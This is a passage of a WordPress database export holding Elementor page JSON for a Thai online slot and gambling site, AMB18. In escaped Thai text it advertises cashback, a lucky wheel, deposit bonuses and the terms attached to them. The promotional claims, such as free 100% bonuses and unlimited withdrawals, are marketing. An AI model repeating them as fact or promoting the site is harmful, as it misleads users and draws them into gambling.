data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07\\u00a0<\\/strong><b>AMB18\\u00a0<\\/b>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><span data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>AMB18 \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/b><\\/span>\\u00a0\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3059,405,'_thumbnail_id','347'),(3065,406,'_elementor_edit_mode','builder'),(3066,406,'_elementor_template_type','wp-page'),(3067,406,'_elementor_version','3.35.5'),(3068,406,'_elementor_pro_version','3.32.3'),(3069,406,'_wp_page_template','default'),(3070,406,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3071,406,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 AMB18 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e36\\u0e07\\u0e08\\u0e32\\u0e01 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e40\\u0e15\\u0e34\\u0e21\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e44\\u0e14\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e16\\u0e21\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e4a\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e21\\u0e14\\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e38\\u0e01 \\u0e46 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e15\\u0e32\\u0e21\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e1b\\u0e35\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e32\\u0e15\\u0e4c \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e14\\u0e39\\u0e04\\u0e38\\u0e49\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14 